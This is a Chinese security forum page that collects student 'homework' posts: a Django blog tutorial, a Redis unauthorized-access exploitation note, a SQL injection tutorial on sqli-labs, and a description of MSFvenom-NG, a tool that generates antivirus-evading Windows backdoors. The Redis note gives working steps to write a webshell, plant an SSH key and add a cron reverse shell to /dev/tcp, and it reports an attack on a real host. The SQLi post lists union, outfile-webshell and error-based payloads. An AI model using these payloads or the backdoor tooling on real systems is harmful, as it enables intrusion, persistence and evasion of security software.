专题之作业篇 – ChaBug安全

[Y4er]6月份作业之Django开发个人博客

Y4er — Mon, 25 Jun 2018 13:11:53 +0000

前言

在学习Python的过程中，觉得有必要学一学Python做web开发，而django作为一种优秀的Python Web框架，自然成为了我的首选，经过不到一个月的学习，总算搞清楚了django的大部分结构和基本的语法，如果你想学django，就和我一起来做一个用django开发的小型个人博客吧！

了解django

django是遵循MVC设计模式的框架，MVC是Model、View、Controller这三个单词的缩写，分别代表了模型，视图，控制器。对于我个人的理解来讲，模型用来与数据库进行交互，视图用来封装html、js、css，控制器则用来处理程序的请求、逻辑结构等。

准备工作

Python3+django2.0+PycharmPro2018

创建项目

你可以使用Pycharm创建，更加方便。

你也可以使用命令行创建，django-admin startproject myblog，当然前提是你已经安装了django，并且cd到了你想把项目创建到哪个目录的具体位置。一行命令创建了一个myblog的项目，接下来我们就该创建app了，先来讲下app与项目之间的关系。

项目和app之间的关系

对于django来说，项目只是一个大框架，他的具体功能还需要在app里面实现，app所对应的就是一个一个的功能模块，比如拿chabug来说，有用户模块，也有文章模块，也有专题模块。

你可以进入到项目的目录，然后这样来创建app python3 manage.py startapp blog

运行

在Pycharm里面你只需要点击右上角的运行按钮就可以运行了，默认是运行在本地的8000端口，也就是127.0.0.1:8000，如果你需要在命令行里面运行，你可以这样python3 manage.py runserver 8000，当然这样运行的只能在本地访问，如何把我们的项目发布出去对公网用户开放呢？下面会讲到。

项目结构

manage.py	项目管理脚本，你可以通过python3 manage.py help查看你能够干什么
settings.py	项目的设置都存放在这
urls.py	这个是用来配置项目的url，例如127.0.0.1/chabug/，或者127.0.0.1/chuyu
wsgi.py	部署的时候用到的，一般上用不到

URL与视图

视图

视图一般写在APP的views.py中，并且第一个参数永远是request对象，这个对象包含了一些请求信息，比如：请求方法GET、POST，头部headers信息等等，然后视图必须返回一个HttpResponseBase，比如下面这个：

from django.shortcuts import render,HttpResponse

def hello(request):
    return HttpResponse("hello")

当然，你现在并不能在浏览器中看到HttpResponse返回的hello，因为我们还没有定义urls.py中的内容，下面就跟我来配置一波把！

URL映射

from django.contrib import admin
from django.urls import path

urlpatterns = [
    path('admin/', admin.site.urls),
]

这是默认的配置，其中admin这一条是django系统自带的映射后台，不用管他。我们来添加一条url来映射我们的hello，首先从app导入views.py

form blog import views

然后添加一条映射关系

from django.contrib import admin
from django.urls import path
from blog import views
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.hello),
]

django会自动从urlpatterns中寻找当前请求url所对应的规则，返回相应的信息。

这个时候在访问127.0.0.1:8000则会出现我们在视图中返回的HttpResponse信息hello

URL传参

两种方法

views.py

def A(request,id):
    text = "你请求的id是:%s " % id
    return HttpResponse(text)
urls.py

from django.contrib import admin
from django.urls import path
from blog import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.hello),
    path('A/', views.A),
]

你可以这样访问127.0.0.1/A/id

第二种

views.py

def B(request):
    id = request.GET.get['id']
    text = "你请求的id是:%s " % id
    return HttpResponse(text)
urls.py

from django.contrib import admin
from django.urls import path
from blog import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.hello),
    path('B/', views.B),
]

你可以这样访问 127.0.0.1:8000/B/?id=1

URL反转

之前我们都是通过url来访问视图函数。有时候我们知道这个视图函数，但是想反转回他的url。这时候就可以通过 reverse 来实现。示例代码如下：

reverse("list")
> /book/list/
传递参数

reverse("book:detail",kwargs={"book_id":1})
> /book/detail/1

URL和视图我们就暂时讲到这里，接下来我们要开始写了，模板的知识会融在其中。

创建模型

from django.db import models


class Article(models.Model):
    title = models.CharField(max_length=50)     #文章标题
    category = models.CharField(max_length=50, blank=True)  #文章分类
    datetime = models.DateTimeField(auto_now_add=True)  #文章发表日期
    content = models.TextField(blank=True, null=True)   #文章内容

    def __str__(self):
        return self.title

    class Meta:
        ordering = ['-datetime']    #以日期倒序

创建完模型后我们需要把模型同步到数据库中

python3 manage.py makemigrations
python3 manage.py migrate

然后在admin.py中注册下我们创建的模型

from django.contrib import admin
from blog.models import Article
# Register your models here.
admin.site.register(Article)

注册模型让我们在django自带的后台管理中显示出来127.0.0.1:8000/admin

发布文章什么的都可以在这操作。

URL设计

我直接贴我的代码

from django.contrib import admin
from django.urls import path
from blog import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.index, name='index'),
    path('/', views.detail, name='detail'),
    path('archives/', views.archives, name='archives'),
    path('tag/', views.tags, name='tag'),
    path('search/', views.search, name='search')
]

视图设计

from django.shortcuts import render, redirect
from blog.models import Article
from django.http import Http404

# 首页视图，展示所有的文章
def index(request):
    sessionid = request.COOKIES.get('sessionid')
    post_list = Article.objects.all()
    return render(request,'index.html',{'post_list': post_list, 'sessionid':sessionid})

#文章详情视图，展示详细的文章内容
def detail(request,id):
    try:
        post=Article.objects.get(id=id)
    except:
        raise Http404
    return render(request,'post.html',{'post':post})

#文章归档
def archives(request):
    try:
        post_list = Article.objects.all()
    except Article.DoesNotExist :
        raise Http404
    return render(request, 'archives.html', {'post_list': post_list, 'error': False})

#分类作为标签，展示同分类下的文章
def tags(request, tag):
    post_list = Article.objects.filter(category__iexact=tag)
    return render(request,'tags.html', {'post_list': post_list})

#搜索
def search(request):
    if 's' in request.GET:
        s=request.GET['s']
        if not s:
            return render(request,'index.html')
        else:
            post_list=Article.objects.filter(title__icontains=s)
            if len(post_list)==0:
                return render(request, 'archives.html',{'post_list':post_list,'error':True})
            else:
                return render(request, 'archives.html',{'post_list':post_list,'error':False})
    return redirect('index')

模板设计

父模板导航条完成

{% load static %}



    
    Index{% block title %} - MyBlog{% endblock %}
    
    
    
    
    {% block head %}{% endblock %}
    



    
        
        
            
                
            
        

        
        
            
                首页(current)
                归档
            
            
                
                    
                
                
            
            
                {% block nav %}
                    {% if sessionid %}
                        进入后台
                    {% else %}
                        登陆
                    {% endif %}
                {% endblock %}
            
        

    


{% block content %}
{% endblock %}

    
            Copyright © 2013 ChaBug. All Rights Reserved.

首页完成

{% extends 'base.html' %}

{% block content %}
    
        {% for post in post_list %}
            
                
                    
                        {{ post.title }}
                    
                    
                        Time：{{ post.datetime|date:"Y-m-d" }}
                            分类：{{ post.category }}
                        
                    
                    
                        {% load markdown_deux_tags %}
                        {{ post.content|truncatechars_html:50 }}
                        Read More
                    
                

            
        {% endfor %}
    
{% endblock %}

归档页面

{% extends "base.html" %}

{% block content %}
    
        {% if error %}
            没找到相关文章
        {% else %}
            
                
                
                OK! 共找到 {{ post_list.count }} 篇日志。 继续努力。
                
            
        {% endif %}
        {% for post in post_list %}
            
                
                    
                         {{ post.title }}
                    
                    
                        {{ post.datetime|date:"Y-m-d" }}
                    
                
            
        {% endfor %}
    
{% endblock %}

我把归档和同分类文章用了同一个模板，通过if判断来展示不同的页面。

标签页面

{% extends 'base.html' %}

{% block content %}
    
        分类:{{ post_list.first.category }}下有{{ post_list.count }}篇日志。 继续努力。
        {% for post in post_list %}
            
                
                    
                        {{ post.title }}
                    
                    
                        Time：{{ post.datetime|date:"Y-m-d" }}
                            分类：{{ post.category }}
                        
                    
                    
                        {% load markdown_deux_tags %}
                        {{ post.content|truncatechars_html:50 }}
                        Read More
                    
                

            
        {% endfor %}
    
{% endblock %}

文章页面

{% extends 'base.html' %}
{% block content %}
    
        
            
                {{ post.title }}
            
            
                Time：{{ post.datetime|date:"Y-m-d" }}
                    分类：{{ post.category|title }}
                
            
            
                {% load markdown_deux_tags %}
                {{ post.content|markdown }}
            
        
    
{% endblock %}

markdown语法

安装markdown插件，

pip3 install django-markdown-deux
然后需要在settings.py中设置

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'article',
    'markdown_deux'
]

在模板中像我那样调用


   {% load markdown_deux_tags %}
   {{ post.content|markdown }}

后记

我们的django开发个人博客总算是结束了，前端模板写的不好，你们可以自己写一波好看的。

[小东]6月份作业之redis未授权漏洞利用

Y4er — Sun, 24 Jun 2018 05:41:15 +0000

偶然发现某大佬博客说了一下Redis的漏洞，便整理了一下笔记，并做了实战测试

0x00 笔记

1.写入webshell
dir=绝对路径
dbfilename="1.php"

2.写入ssh公钥匙
本机生成公钥 sshssh-keygen -t rsa -C "test@test"
dir=/root/.ssh/
dbfilename=authorized_keys

\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH aariz@el8.land\n\n\n\n

3.写入定时任务，反弹shell
dir=/var/spool/cron
dbfilename=root
set crack "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n"

________________________________________

0x01 实战测试

使用redisk客户端链接远程主机6379端口

redis-cli -h xxx.xxx.xxx.xxx -p 6379

IP打码了（这码打得不错吧）
拿WEBSHELL过程：

config set dir 网站绝对路径
config set dbfilename info.php //设置info.php为备份文件
set web '' //写入一句话到info.php
save //保存，然后即可通过菜刀url链接info.php即可

最后Getshell：

[小东]6月份作业之SQL注入基础-基于Sqli-lab平台

Y4er — Sun, 24 Jun 2018 05:39:23 +0000

简介：SQL注入是一个常见的漏洞，在所有的安全防护统计数据儿结果中显示，SQL注入几乎占据网络攻击问题的60%左右，由此可见SQL注入漏洞是一种常见的WEB漏洞，了解SQL注入对于网络安全工作者或安全爱好者来说，是非常有必要，本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。

0x00 SQL注入漏洞简介

有关SQL注入的各种定义阐述已经很多，大家可自行使用搜索引擎搜索即可，小东不再赘述。

0x01 SQL注入产生的原因

简单来说，每天熬夜敲代码的程序员，写程序的时候，没有考虑到程序在与数据库交互时会产生一些安全问题，倘若没有对用户输入的数据正确判断、过滤，就会导致用户可以构造恶意的payload来获取更多的数据( 执行用户的任意操作 )，甚至是Download数据库，导致信息泄漏，甚至导致受害人受到人身攻击或威胁。

0x02 SQL注入检测方式
常见的SQL注入是基于sql语言来的，有 SELECT UPDATE INSERT 这三种SQL语句，注入原理都是类似的，了解一下SQL语法即可，下面以SELECT查询语句为例子。

1. SELECT 类型

源码：

";
      echo 'Your Login name:'. $row['username'];
      echo "
";
      echo 'Your Password:' .$row['password'];
      echo "";
      }
    else //否则输出错误消息
    {
    echo '';
    print_r(mysql_error());  //此处输出了mysql的错误消息，正常的线上产品，这种调试输出的语句都得注释或删除
    echo "";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}  //如果用户没有传递id值则在页面输出这一句话，如第一幅图所示

?>

2.检测SQL注入

通过上面的源码分析，如果我们的SQL语句有错误，那么将会输出错误信息，也就说明了SQL语句没有正确执行，用户提交的而数据导致了程序原本的SQL语句失效。
检测方法常见在参数后面加上’ and 1=1 and 1=2 xor 1=1 等等来判断是否存在SQL注入(是否过滤)，如下所示

3.构造Payload

http://www.test.com/Less-1/index.php?id=-1%27%20union%20select%20user(),database(),version()%20%23

妥妥的SQL注入，一般情况下，注入是不会有数据回显的，这时候我们就可以通过SQL盲注的方式，或者简单粗暴的SQL查询写文件的方式，盲注挺麻烦的，一个个手工猜解当然是不可能的，当我们构造好了payload只需要用Python写个脚本，跑一下就行了，SQL盲注放到下篇文章再讲，写文件的方式需要：

知道绝对路径
知道该文件有可写入的权限，一般选择缓存文件夹cache
如下可写入文件：

http://www.test.com/Less-1/index.php?id=-1%27%20union%20select ‘’ into outfile ‘D:\\Server\\sqli\\Less-1\\1.php’ %23

访问，即可在当前Less-1目录下生成一个1.php文件，会显示输出phpinfo信息
访问：http://www.test.com/Less-1/1.php

0X03 总结

总的来说，SQL注入漏洞很常见，在代码审计的时候是一个需要格外重视的漏洞，即使程序有做过滤，多思考，结合程序其他的漏洞，配合起来就可以绕过过滤，文章有不妥之处，还望批评指正，联系QQ：1099718640！

0x04 更多解题过程Word文档下载地址：

蓝奏网盘：https://www.lanzous.com/i18ww4h
百度网盘：https://pan.baidu.com/s/1_yNCrK4uMm7rCNzWIdVthw

0x05 补充

Mysql中的注释符

#
-- 
/*...*/
/*!...*/ 内联注释 /*!50select*/（mysql版本大于50执行）

常见函数

system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统 Windows Server 2003

字符串拼接函数：

  concat(str1,str2)
concat_ws(separator, str1,str2...)
group_concat(str1,str2......)

布尔注入、延时注入用到的一些函数

1， exists()
2， ascii()
3， substr()


exists()函数：
esists 用于检查子查询是否会返回一行数据，该子查询实际上并不返回任
何数据，而是返回True或False。

ascii()函数：
返回字符串str的最左面字符的ASCII代码值。如果str是空字符串，返回0。如果
str是NULL，返回NULL。

substr( ) 函数：
substr(string, num start, num length) start #从第1位开始，。
string 为字符串；
start为起始位置；
length为长度。
substr(database(),1,1); xss
x
limit 0,1
0 查询的位置，0表示第一行，
1 查询的条数

报错注入用到的一些函数

floor() 
floor(x),有时候也写做Floor(x)，其功能是“向下取整”，或者说“向下
舍入”，即取不大于x的最大整数
1.select * from admins where id=1 and (select 1 from (select count(*)
,concat(user(),floor(rand(0)*2))x from information_schema.tables gr
oup by x)a);
2.获取有多少个数据库 and (select 1 from(select count(*),concat((select
(select (select concat(0x7e,count(schema_name),0x7e) from
information_schema.schemata)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group
by x)a)

通过limit 获取所有数据库名
and (select 1 from(select count(*),concat((select
(select (select concat(0x7e, schema_name, 0x7e)
from information_schema.schemata limit 0,1)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)

常见报错函数：

ExtractValue函数：
EXTRACTVALUE (XML_document, XPath_string);
第一个参数：XML_document是String格式，为XML文档对象的
名称，文中为Doc
第二个参数：XPath_string (Xpath格式的字符串).
作用：从目标XML中返回包含所查询值的字符串

and extractvalue(1, payload)


UpdateXML函数：
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数：XML_document是String格式，为XML文档对象的
名称，文中为Doc 1
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解
Xpath语法，可以在网上查找教程。
第三个参数：new_value，String格式，替换查找到的符合条件的
数据
作用：改变文档中符合条件的节点的值

+and updatexml(1,payload,1)

[X1r0z]6月份作业之MSFvenom-NG

Y4er — Sun, 24 Jun 2018 05:35:47 +0000

MSFvenom-NG

           ___
 _____ ___|  _|_ _ ___ ___ ___ _____
|     |_ -|  _| | | -_|   | . |     |
|_|_|_|___|_|  \_/|___|_|_|___|_|_|_|
         	MSFvenom-NG

Introduction

MSFvenom-NG 是一款交互式 Windows (EXE/DLL Powershell) 后门生成工具

支持自定义编码规则 Bypass 杀毒软件

Usage

python3 main.py

程序第一次运行会进行初始化 (创建 tmp 目录并生成 config.json rules.json)

[*] Initializing
[+] Initialized successfully

    	   ___
 _____ ___|  _|_ _ ___ ___ ___ _____
|     |_ -|  _| | | -_|   | . |     |
|_|_|_|___|_|  \_/|___|_|_|___|_|_|_|
         	MSFvenom-NG
         		Ver: 1.1
    	

        (E)XE/DLL Backdoor
        (P)owershell Backdoor
        (S)tart msf Listener
        (C)ustom Settings
        (Q)uit
        
MSFvenom-NG>:

Enc

编码规则位于 rules.json 中

{
"x86": {
	"test_rule": "S1"
	}
}

格式: 字母+数字 (编码器编码次数)

字母对应的编码器位于 lib/enc.py 中

x64:

	X: x64/xor
	Z: x64/zutto_dekiru

x86:

	F: x86/add_sub
	H: x86/alpha_mixed
	E: x86/alpha_upper
	R: x86/avoid_underscore_tolower
	U: x86/avoid_utf8_tolower
	X: x86/bloxor
	B: x86/bmp_polyglot
	C: x86/call4_dword_xor
	P: x86/context_cpuid
	T: x86/context_stat
	I: x86/context_time
	D: x86/countdown
	M: x86/fnstenv_mov
	J: x86/jmp_call_additive
	K: x86/nonalpha
	L: x86/nonupper
	O: x86/opt_sub
	V: x86/service
	S: x86/shikata_ga_nai
	G: x86/single_static_bit
	Y: x86/unicode_mixed
	N: x86/unicode_upper

Ex: S5D3E2 (x86/shikata_ga_nai x5 x86/countdown x3 x86/alpha_upper x3)

Powershell 默认使用 cmd/powershell_base64 编码器

CHANGELOG

2017-06-24 Updated Ver:1.2 添加自定义设置 listener, 一键启动 metasploit 监听器
2018-06-23 Updated Ver:1.1 重构代码,只针对 Windows 平台,支持 encoder
2018-02-24 Released Ver:1.0 多平台 payload 生成

TODO

免杀 Meterpreter 监听流量

自定义设置 (指定 msf 路径默认参数…)